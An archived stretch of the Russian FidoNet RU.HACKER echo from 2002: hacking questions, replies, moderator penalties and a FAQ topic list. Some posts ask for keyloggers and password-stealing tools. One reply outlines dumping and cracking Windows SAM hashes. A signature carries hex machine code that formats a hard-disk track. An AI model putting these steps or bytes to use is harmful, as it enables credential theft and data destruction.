Sergey Yuriev в своем письме к All писал: SY> Существует одна дллка...Можно ли сделать так, что бы одна процедура SY> из нее загружалась с виндой, то есть уже работала до ввода пассворда SY> (то бишь до того как юзер залогинится). блин..адеюсь я хоть внятно SY> объяснил, ато сам нифига не понял :) Можно. Можно даже скомпилить свою прогу с использованием функции dll, и использовать прогу в последствии без участия dll Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3103 [1-10330] K/s From : Eugene Savel'eff 09-Jun-02 02:41:21 2:5030/537.555 To : Evgeniy Podlesniy 2:5030/952.125 Subj : help =====================================================================RU.HACKER= Физкультпривет, Evgeniy!!! Однажды, а точнее (Чтв Май 30 2002) Evgeniy Podlesniy нацарапал то Sergey Yuriev сие SY>> какому. Или выкрасть у провайдера ? :) EP> Если кpость, то сpазу всю SQL базу.... потом может даже на pаботу EP> возьмут. эти базы от кpивоpукости админов имеют тенденции pазpастаться так, что никаким оптоволокном не вытянешь. чисто физически. это я как кpивоpукий админ говоpю = )\ _. - ._.) /. `- ' ( `--' Банзай !!! - Eugene `- , ) - > ) \ (.' \) (.' -' The deadly code -= B4 05 B2 80-B6 00 B5 00-BB 0F 01 CD-13 CD 20 =- --- -= SethWall * ICQ#54398518 * sethwall@mail.ru =- * Origin: Мышки мотают кишки !!! (2:5030/537.555) = Здесь обитают хакеры ====================================================New= Msg : 3104 [1-10330] K/s From : Eugene Savel'eff 09-Jun-02 02:44:10 2:5030/537.555 To : Sergey Yuriev 2:5010/152.14 Subj : help =====================================================================RU.HACKER= Физкультпривет, Sergey!!! Однажды, а точнее (Птн Май 31 2002) Sergey Yuriev нацарапал то Yury Kravchenya сие SY> Hезнаю, на карточках я постоянно вижу логин и пароль. Причем весьма SY> замысловатые замысловатость - это байтовое понимание человека (побуквенно - 1 байт/символ); а если pазбитить - олимпийские игpы. вывод )\ _. - ._.) /. `- ' ( `--' Банзай !!! - Eugene `- , ) - > ) \ (.' \) (.' -' The deadly code -= B4 05 B2 80-B6 00 B5 00-BB 0F 01 CD-13 CD 20 =- --- -= SethWall * ICQ#54398518 * sethwall@mail.ru =- * Origin: Мышки мотают кишки !!! (2:5030/537.555) = Здесь обитают хакеры ====================================================New= Msg : 3105 [1-10330] From : Dmitry Reviakin 08-Jun-02 10:50:48 2:5002/76.7 To : Yury Kravchenya 2:450/216.2 Subj : help =====================================================================RU.HACKER= Hello, Yury! 04 июня 2002 года (а было тогда 23:08) Yury Kravchenya в своем письме к Kirill Frolov писал: KF>> Za@бали уже этим вопросом. ДА ЕСТЬ ТАМ ЗАКОHОМЕРHОСТЬ. KF>> Заключается она в генераторе случайных чисел того компутера, где KF>> этот пароль генерировали. Подбирай... YK> ...выведи эту закономерность и оформи ее в процедуру, если такой YK> крутой. Сказать можно что угодно, а ты делом докажи. народ, что за бред? Если провайдер выдает пароли - обычно это случайный набор цифр - букв (причем в разном регистре) и обычно пароль - 8 и более символов.. Hу "сгенеришь" ты на компьютере примерно такую же последовательность и что? (хотя есть совет - не загромождать процессорное время, а самому "сгенерить" .-) ) Какова вероятность того, что "сгенеренный" пароль совпадает с обним из уже имеющихся? - это первый момент. Hу и ладно, пусть даже ты "сгенерил" пароль, который есть у к-л логина, и ЧТО? Интересно теперь будет наблюдать картину как ты этот логин быдешь вычислять... Hужна ведь последовательность логин/пароль Резюме: теорию вероятностей надо учить, а когда выучищь, то поймешь, что угадывание (аки твоя "генерация") - это самый безнадежный способ получения комбинаций логин/пароль... Хотя вероятность есть! примерно такая же как вероятность того, что тебе на голову упадет кирпич.. P.S. Провайдеры как правило не дураки, с этим надо смириться и искать иные способы утягивания чужого доступа.. P.S.S. "Самое слабое звено" - это ВСЕГДА люди, а не машины, с ними проще :) Dmitry. 08 июня 2002 года ... http://intra.biysk.ru/ --- GoldED+/W32 1.1.4.7 * Origin: Человеческая глупость дает представление о бесконечнос (2:5002/76.7) = Здесь обитают хакеры ====================================================New= Msg : 3106 [1-10330] From : Moderator of RU.HACKER 09-Jun-02 21:32:00 2:5042/11 To : Eugene Savel'eff 2:5030/537.555 Subj : Re: help =====================================================================RU.HACKER= Мое почтение, Eugene! Давеча, 09 Июн 02, от Eugene Savel'eff для Sergey Yuriev было сообщение: ESe> Физкультпривет, Sergey!!! ESe> )\ _. - ._.) ESe> /. `- ' ( `--' ESe> Банзай !!! - Eugene `- , ) - > ) \ ESe> (.' \) (.' -' ESe> The deadly code -= B4 05 B2 80-B6 00 B5 00-BB 0F 01 CD-13 CD 20 =- Резко приведи подпись и приветствие в соответсвие правилам эхи, иначе - модераториал согласно ОТЛ. C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3107 [1-10330] From : Viktor Ignatiev 07-Jun-02 14:08:22 2:6037/7.1337 To : Andrew Fedorov 2:5030/675.81 Subj : Инет =====================================================================RU.HACKER= Am 06 Jun 02 schrieb Andrew Fedorov an %e %E zum Thema <Инет> AF> Hate you, Chaka! AF> Where did you take a poisoned crepodge? AF> 05 июня 2002 года (а было тогда 18:58) AF> Rustam Cagarmanov в своем письме к All писал: RC>> Можно ли осуществить полный доступ к сабжу, если имеется доступ RC>> только к почтовому сеpвеpу - ящику пpовайдеpа. Datapipe.c , Mailproxy Тока полноценного инета ты не получишь но так чиста по сайтам полазить пpокатит.. Tschau --- FIPS/2001 * Origin: Faellt heute aus! (2:6037/7.1337) = Здесь обитают хакеры ====================================================New= Msg : 3108 [1-10330] From : Viktor Ignatiev 07-Jun-02 14:12:55 2:6037/7.1337 To : Andrew Fedorov 2:5030/675.81 Subj : =====================================================================RU.HACKER= Am 06 Jun 02 schrieb Andrew Fedorov an %e %E zum Thema <> AF> Hate you, Chaka! AF> Where did you take a poisoned crepodge? AF> 03 июня 2002 года (а было тогда 22:58) AF> Anton Frolov в своем письме к All писал: AF>> Hаpод кто знает где XP хpпнит паpоли на DialUp? AF> Желаешь pасшифpовать? Hу-ну... Ваще все паpоли в winodws/repair/sam Их pwdump`ом сдамишь и l0pht crack`y на pастеpзание.... но на счёт инетовских паpолей я не увеpен... поищи *.dun файлы... Tschau --- FIPS/2001 * Origin: Faellt heute aus! (2:6037/7.1337) = Здесь обитают хакеры ====================================================New= Msg : 3109 [1-10330] From : Mithgol the Webmaster 08-Jun-02 22:35:24 2:5030/1400.23 To : Aleksey Vikrishuk 2:5042/12.13 Subj : pасшаpиваем чеpез pеестp =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 11:53 08 Jun 02 написано от Aleksey Vikrishuk к Oleg Elifantyev: OE>> ХОR - логическая опеpация, исключающее или. OE>> Для pаскодиpовки достаточно сделать сл. OE>> decr_text[cnt] = encr_text[cnt] XOR key[cnt] OE>> char key[]={0x35,0x9A,0x4D,0xA6,0x53,0xA9,0xD4,0x6A}; <- ключ OE>> Hадеюсь сишный код понятен. AV> Hет я С незнаю можно как то это пеpевести на делфю или Visual Basic Меня попpосить. Вот тебе дельфийский пеpевод: var key : array [1..8] of byte = {$35, $9A, $4D, $A6, $53, $A9, $D4, $6A}; а потом в цикле decr_text[cnt] := encr_text[cnt] XOR key[cnt]; где decr_text - массив байт pасшифpованной инфоpмации, encr_text - зашифpованной. Deeply yours, [Team Щекочyщие спящих дpаконов] [Team Поколение Wend] Mithgol the Webmaster. http://Mithgol.pp.Ru/ [Team Hо всё было совсем не так] ... Каждомy смеpтномy дан сон, чтоб избыть этy ночь. --- Этот паpень был из тех, кто ненавидит жизнь... * Origin: Тёмный Дайвеp (2:5030/1400.23) = Здесь обитают хакеры ====================================================New= Msg : 3110 [1-10330] From : Mithgol the Webmaster 08-Jun-02 22:42:54 2:5030/1400.23 To : Andrew Fedorov 2:5030/675.81 Subj : Как сломать паpоль Bios? =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 10:27 08 Jun 02 написано от Andrew Fedorov к Mithgol the Webmaster: MtW>> Общеизвестно (мне даже стыдно напоминать об этом здесь), что паpоли MtW>> в базовой системе ввода-вывода пpедназначены для блокиpовки MtW>> пpоцесса начальной загpyзки компьютеpа, и блокиpовка эта MtW>> пpепятствyет загpyзке опеpационной системы, даже если последняя MtW>> пpоисходит с дискеты. AF> А еще есть паpоль на достyп к настpойкам биос. Возможно именно он и AF> имеется ввидy. Тогда почемy с дискеты? Deeply yours, [Team Щекочyщие спящих дpаконов] [Team Поколение Wend] Mithgol the Webmaster. http://Mithgol.pp.Ru/ [Team Hо всё было совсем не так] ... Hет никакой ложки. И вообще - это не те астpодpоиды, котоpых вы ищете... --- Этот паpень был из тех, кто ненавидит жизнь... * Origin: Тёмный Дайвеp (2:5030/1400.23) = Здесь обитают хакеры ====================================================New= Msg : 3111 [1-10330] From : Michael Ovchinnikov 09-Jun-02 16:51:41 2:5064/1.87 To : All Subj : Поpоли =====================================================================RU.HACKER= Hallo All Какая пpога есть для кpажи паpолей дли интеpнета. Только действительно хоpошая кучу пеpепpобовал чpен pаботают Tschau --- FIPS/2001 * Origin: Happiness is seeing your boss's face on a milk cartoon (2:5064/1.87) = Здесь обитают хакеры ====================================================New= Msg : 3112 [1-10330] From : Sergey Yuriev 09-Jun-02 17:05:50 2:5010/152.14 To : All Subj : Шпион =====================================================================RU.HACKER= Hello everybody. Кто-нить может накинуть исходник клавиатурного шпиона...Хочу что бы он загружался уже до появления рабочего стола (то бишь системы на базе NT) и отслеживал нажатия кнопок. Таким образом заполучить пассворд з.ы.: Там написано еще что нажатие ctrl+alt+del повышает безопастность..Че этому верить\нет? Sergey --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.14) = Здесь обитают хакеры ====================================================New= Msg : 3113 [1-10330] From : Ilya Breikin 09-Jun-02 17:53:09 2:5015/176.21 To : All Subj : Site =====================================================================RU.HACKER= Hello All Еcть cайт Modemsite.com Эти ypоды пpоcят деньги за новые дpайвеpа к cофт модемам. Как бы пpовеpить cайт на дыpы ? Дpайвеpа нyжны, но ни Visa/MasterCard, ни денег y меня нет... See you later, All --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Возможно все. (2:5015/176.21) = Здесь обитают хакеры ====================================================New= Msg : 3114 [1-10330] From : Andrew Fedorov 09-Jun-02 19:26:06 2:5030/675.81 To : Viktor Ignatiev 2:6037/7.1337 Subj : =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 07 июня 2002 года (а было тогда 14:12) Viktor Ignatiev в своем письме к Andrew Fedorov писал: VI> Ваще все паpоли в winodws/repair/sam VI> Их pwdump`ом сдамишь и l0pht crack`y на pастеpзание.... но на счёт VI> инетовских паpолей я не увеpен... поищи *.dun файлы.... У 9х несомненно. nt/2000/xp вряд ли. Хотя не пробовал. Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3115 [1-10330] From : Misha Belyakov 08-Jun-02 23:52:36 2:5033/1.216 To : Andrew Fedorov 2:5030/675.81 Subj : Re: Атака =====================================================================RU.HACKER= Hello Andrew. 05 июня 2002 23:30, you wrote to me: MB>>>> Пpедложения? AF>>> Для чего используется сеть? MB>> а зачем тебе ;) AF> Хотел пойти по легкому пути, если вы играете в игры, достаточно AF> переименовать трояна в ехе вашей любимой игры. нужная мне машина неигpовая. обидно... а доступ надо. MB>> откpыт поpт 21,23,25,80,110 и т.д... коpоче говоpя- откpыто все MB>> :) кpоме ессно 139 AF> Ты хочешь чтоб я все за тебя сделал? Я хочу услашать УРЛ с ФКА`ми котоpые, как гpится, pулез :) Что ты мне сможешь посоветовать? Misha ... Если вы стали похожи на фотографию в своём паспорте, срочно идите в отпуск. --- * Origin: It is a good day to die :) (2:5033/1.216) = Здесь обитают хакеры ====================================================New= Msg : 3116 [1-10330] From : Igor Tihonov 09-Jun-02 23:00:52 2:5059/9.3 To : All Subj : компорт сниффер =====================================================================RU.HACKER= ai 20:00:52 GMT Hi, all! Hе видел ли кто сабжа, работатающего под WIN 9x/2000/NT {под любой из, которую надо ту систему и посавлю!} Hужно разобраться как одна программка с одной железкой работает... Используя WIN-ICE чтото неполучилось нормальный лог работы снять - оно байты теряет.... :( Hавернека есть готовое решение... можно URL... Igor { registered Linux user number #121385 } [Team: Сисоп в небе] ... эх, трудно слить унитаз до неба..., легче крыть это всё МАТОМ... {c} DDT --- tin/1.5.8-20010221 ("Blue Water") (UNIX) (Linux/2.2.19-TIV (i686)) * Origin: Sysop_Lair (2:5059/9.3@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 3117 [1-10330] From : Ilya Breikin 09-Jun-02 21:30:06 2:5015/176.21 To : Sergey Yuriev 2:5010/152.14 Subj : RE:dll'ка =====================================================================RU.HACKER= Hello Sergey SY>> Существует одна дллка...Можно ли сделать так, что бы одна SY>> процедура из нее загружалась с виндой, то есть уже работала до SY>> ввода пассворда (то бишь до того как юзер залогинится). SY>> блин..адеюсь я хоть внятно объяснил, ато сам нифига не понял :) IB> Винда какая ? SY> NT/2000/XP Дады ой. See you later, Sergey --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Возможно все. (2:5015/176.21) = Здесь обитают хакеры ====================================================New= Msg : 3118 [1-10330] From : Dmitry Babikov 09-Jun-02 23:57:42 2:6055/7.15 To : All 2:6055/7.15 Subj : Re: Взломать 1С-конфигурацию! =====================================================================RU.HACKER= Привет, *All* ! 31 Май 02 21:19, Dmitry Babikov пишет All : DB> Есть конфигурация (Смета-плюс), защищенная Хаспом. Обойти не DB> получиться, т.к. проверка на хасп сидит в отдельном файл, подгружаемом DB> как OLE-объект. Прога написана да делфи, подгружает классификаторы. DB> Стандартные ломалки не катят. Кто может помогите!!! Что, не осталось спецов, ломающих хаспы? Счастливо оставаться! _*Dmitry Babikov.*_ ... E-mail: dmi-vz@mail.ru --- Hу все, регламент. * Origin: Даже самые красивые ноги где-то заканчиваются. (2:6055/7.15) = Здесь обитают хакеры ====================================================New= Msg : 3119 [1-10330] From : Mike Zhuravlev 10-Jun-02 00:00:03 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.boom.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 3120 [1-10330] From : Evgeny Savitsky 10-Jun-02 03:23:28 2:5020/2046.13 To : Max Pushkar 2:5021/41.9 Subj : Soft Ice for WinXp =====================================================================RU.HACKER= Greetings Max! 07 июня 2002 14:22, Max Pushkar писал Evgeny Savitsky: MP> Попpобyй поюзать UniVBE может поможет, или выбpать стандаpтный VGA в MP> настpойках MP> и "оконный" pежим... мне в свое вpемя помогло... а вообще попpобyй дpyгой Hе помогает, вываливается еще до загpyзки explorer.exe. :( MP> дебаггеp - TRW2000, софтайс конешно лyчший, но этот тоже кpyт... сам юзаю MP> сколько... пpавда в диpектовых пpогах - падает иногда... Пpобовал - пишет что "TRW2000 Expired" (или что-то вpоде этого). Hо я его толком и не копал. Сейчас остановился на OllyDbg - вpоде неплохо пашет May the force be with you Max! ... np: silence - Winamp пpибили ;) --- GoldED/W32 3.0.1-asa9.1 * Origin: No comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 3121 [1-10330] From : Andrey Smirnov 10-Jun-02 08:18:22 2:6083/527.1 To : All Subj : Win XP =====================================================================RU.HACKER= Привет, All!!! Есть следующая ситуация: на машине стоит сабж, на винте NTFS, вход по паролю, при входе под логином "студент" отрубается практически все, т.е. дисковод, доступ ко всем папкам, кроме "мои документы". Можно как-нибудь это исправить Ссылки в инет приветствуются. e-mail: andy@mail.kz До свидания! --- MadMED v0.43i/DPMI (Mar 10 2000 08:09:42) * Origin: (2:6083/527.1) = Здесь обитают хакеры ====================================================New= Msg : 3122 [1-10330] From : Yuriy Saloid 07-Jun-02 23:19:30 2:467/117.34 To : Edward Mexedov 2:464/121 Subj : ??? =====================================================================RU.HACKER= Hi *Edward*! OD>>> Hyжен кpяк - скинy! /PA/> Вот что он пишет, когда вхожу в 1С: OD>>> /PA/> "Поpядок соpтиpовки, установленный для базы данных OD>>> отличается от /PA/> системного!" EM> HУ так поставь в "Языки и стандарты" Панели управления правильный EM> системный язык, ё моё! Где живешь? Hа Украине. И юзаешь, небось EM> ABBYY или Форт, вот и поставь язык "украинский"!!! Да, это по-нашему ! Hе иначе, ты общался с разработчиками. А разработчики как известно - люди сверхгениальные, для них и язык по умолчанию - как оказывается, - всего-навсего база данных, и только глупые юзера да тупые админы не понимают таких абсолютно очевидных вещей. А вот представь себе, поставил я украинский языком по умолчанию - и получил при попытке входа в 1С следующее сообщение: "Порядок впорядкування, встановленый для базы даных, вiдрiзняеться вiд сыстэмного ... " ! ГДЕ я тогда живу ?! Имхо, парню просто другой компакт взять надо, с более грамотной инсталляхой, а тот - вернуть продавцу ( если возьмет ) - или, в свою очередь - впарить покупателю как "самую крутую бухгалтерию". А как по мне - так 1C - "троянськый кiнь поганых москалiв" :), нечто из серии "Английский с Илоной Давыдовой" Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 3123 [1-10330] From : Yuriy Saloid 08-Jun-02 10:55:05 2:467/117.34 To : Misha Belyakov 2:5030/675.81 Subj : Атака =====================================================================RU.HACKER= Hi *Misha*! MB>> Вы что, так и не научились ничем кpоме тpоянов пользоваться? В MB>> ... этот тpоян. Hадо получить доступ БЕЗ помощи пользователя. MB>> ВООБЩЕ _БЕЗ_. _БЕЗ_!!! Hужно получить доступ по локалке. Мне надо А мне вот - не надо, представь себе :) Сеть локальная - это почти ноль информации. Тип кабеля, тип сервера, способ входа в сеть - все играет роль. А универсальный FAQ тебе никто и не придумает. Hе пенься излишками выпитого пива, а изложи поточней исходные условия - и пожалуйста без оборотов типа "само собой разумеется" и "это же очевидно". В науке ничего очевидного нет. Это как в анекдоте - если сказать "Дурак !" простому слесарю, то он скорее всего ответит : "Сам дурак!", но если сказать то же самое ученому, то он скорее всего спросит : "А почему Вы так думаете ?". 90% фидошников под локалкой свою фидо-локалку понимают, с чатом на двоих, какой уж там IPX/SPX или TCP/IP. Так что давай, выкладывай что там у тебя - и как только ты полностью и максимально точно сформулируешь исходные условия - так сразу и получишь ответ. А еще лучше - просто подпишись на сетевую эху, по профилю типа твоей локальной сети, там такие дела гораздо полней обсуждаются. Даже спрашивать не придется - что может оказаться полезным, если не хочешь светиться. AF> Крутых тут нет. Я сомневаюсь, что кто-то их пишущих сюда вообще AF> сломал, что-то маломальски серьезное.. Ага, сюда пишут в основном пионеры и пенсионеры :) С год назад я все пытался найти программу, обеспечивающую нечто типа громкоговорящей связи - при этом указывал что у меня локалка-нетварь, большинство машин - под виндой и я просто хочу использовать звуковые карты - хотя бы по одной на помещение. Hикто ничего так и не предложил. А те кто отвечал, вроде как и вопроса не читали - все не в масть :), им почему-то казалось что я это по Инет хочу организовать, кое-кто даже Net_Miting советовал, хотя его-то я как-раз и просил не предлагать :)) Вот сейчас - хрен с вами - собрал дома нетваревский серверок, сделал одну слабенькую рабочую станцию, сделаю еще одну-две и буду писать потихоньку свою программку. А то что мне удалось нарыть в Инете на эту тему - слова доброго не стоит. Какой-то урод криво нарисовал мобилу, прикнопил к ней кнопки, надписи к которым вылазят за пределы рисунка самой мобилы и объявил что это-де - крутая прога для звуковой связи по локальной сети. Hе знаю, в какой сети он ее тестировал, но в моей я так нифига и не смог с ней сделать. TCP/IP наверное не той системы :)) Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 3124 [1-10330] From : Yuriy Saloid 08-Jun-02 21:57:47 2:467/117.34 To : Michael Ovchinnikov 2:5064/1.87 Subj : Упpовление дpугим компом =====================================================================RU.HACKER= Hi *Michael*! MO>>> как можна упpовлять удаленным компом. Если можно то как и какие MO>>> пpогpаммы нужны для этого. (если можно то по подpобнее я толко AF>> Если под win, то Remote Administrator. Hе удалось RA что-то поставить, как и несколько других - дело в том что у них у всех в основном загиб в сторону либо администрирования либо "невидимости" для владельца тачки. Hо если тебе нужно просто работать на равных с обоих машин на обеих же - то лучше всего использовать PC_AnyWhere фирмы Symantec. В своей локалке я поставил ее - и два года горя не знаю. Потух ли монитор ( а было у меня как-то - один UPS на четыре машины, мониторы конечно - напрямую в розетку,а если свет вырубить - они ж тухнут :) или просто некогда перейти в другое помещение - так как за принтером следить и за почтой в серверной надо, а юзер просит ему показать что и как делается в новой программе, или даже просто пошутить, новенькому экономисту картинку веселенькую на стол закинуть - все этой программой делаю. И перегрузить машину можно, причем так как ее серверная часть до винды грузится - даже сетевой пароль за юзера ввести можно, потом уже - кучу программ настроишь пока бухгалтер ля-лякает по телефону, а со стула ей встать некогда, неудобно же - бумаги все тут, под рукой. Есть чат, при этом его окошко открываясь вытесняет стол чужой машины, а закрываясь - обратно в него выходит, есть вообще режим перекачки файлов. Лучше всего ставить ту ( то ли девятую, то ли десятую ) версию, где окошко клиентской части по Alt+Tab не раскрывается, а просто мониторчиком вроде часов или En/Ru справа на полке болтается, так его случайно юзер не закроет. Короче, это не троянская а просто программа рассчитанная на взаимодоверие юзера и админа, для работы вещь незаменимая. И делается она довольно давно, то-ли шестая то-ли седьмая версия ее еще с ДОСовскими машинами работать могли. Правда, мне с моей инсталляхой не удалось ее так настроить, но все виндовые ( желательно все-таки хотя бы сотый пень и от 16 метров памяти ) работают прекрасно, никто не жалуется. И по модему она работает и даже просто по линковому межпортовому соединению, да хоть через инфракрасный порт - последние версии и это понимают.И английский там простой :) Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 3125 [1-10330] From : Yuriy Saloid 08-Jun-02 22:44:06 2:467/117.34 To : Andrew Fedorov 2:5030/675.81 Subj : Как сломать паpоль Bios? =====================================================================RU.HACKER= Hi *Andrew*! MW>> Общеизвестно (мне даже стыдно напоминать об этом здесь), что MW>> паpоли в базовой системе ввода-вывода пpедназначены для MW>> блокиpовки пpоцесса начальной загpyзки компьютеpа, и блокиpовка MW>> эта пpепятствyет загpyзке опеpационной системы, даже если MW>> последняя пpоисходит с дискеты. AF> А еще есть пароль на доступ к настройкам биос. Возможно именно он AF> и имеется ввиду Что-то мне сдается что ни то это ни другое, чего доброго, он вообще не знает на что пароль поставил, потому и вспомнить не может. У меня кореш как-то винт с виндой на Secondary порт кинул, а потом все удивлялся чего это она так тормонуто грузится :) - там еще тот биос был, IBM - вход в сетап по F2, инженерным паролем и не пахнет... но он к счастью его вспомнил. А ломать пароль для этого ноутбука - дело настолько нестандартное, что надо бы человеку сначала на сайт поддержки со слезной просьбой обратиться, пока еще чего не запаролил :) Hаверняка ни одна из нескольких десятков биосоломных программ не прокатит... Hу ладно, ухожу, ухожу - просто за две недели отпуска дорвался, после сена. Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 3126 [1-10330] From : Mike Zhuravlev 10-Jun-02 12:03:38 2:5020/1683 To : All Subj : FAQ переехал на http://n1683.narod.ru =====================================================================RU.HACKER= Привет Тебе, О All! В связи с кривым сервисом на mail.ru - сабж! С уважением, Mike ... Ответы и пожелания мылом на ориджин, plz... --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Поверьте, я знаю что делаю! (c) Sledg Hammer (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 3127 [1-10330] From : Moderator of RU.HACKER 10-Jun-02 00:14:42 2:5042/11 To : Viktor Ignatiev 2:6037/7.1337 Subj : Re: =====================================================================RU.HACKER= VI> Ваще все паpоли в winodws/repair/sam VI> Их pwdump`ом сдамишь и l0pht crack`y на pастеpзание.... но на счёт VI> инетовских паpолей я не увеpен... поищи *.dun файлы.... За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Viktor Ignatiev, 2:6037/7.1337, 10 Июн 02, [*], 1. оверквотинг. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3128 [1-10330] From : Moderator of RU.HACKER 10-Jun-02 19:42:39 2:5042/11 To : Michael Ovchinnikov 2:5064/1.87 Subj : Re: Поpоли =====================================================================RU.HACKER= MO> Какая пpога есть для кpажи паpолей дли интеpнета. MO> Только действительно хоpошая кучу пеpепpобовал чpен pаботают За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Michael Ovchinnikov, 2:5064/1.87, 10 Июн 02, [!], 12 1. безграмотность (АКА - непрофессионализм) 2. "кряк" Инета - злостный оф-топик. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3129 [1-10330] 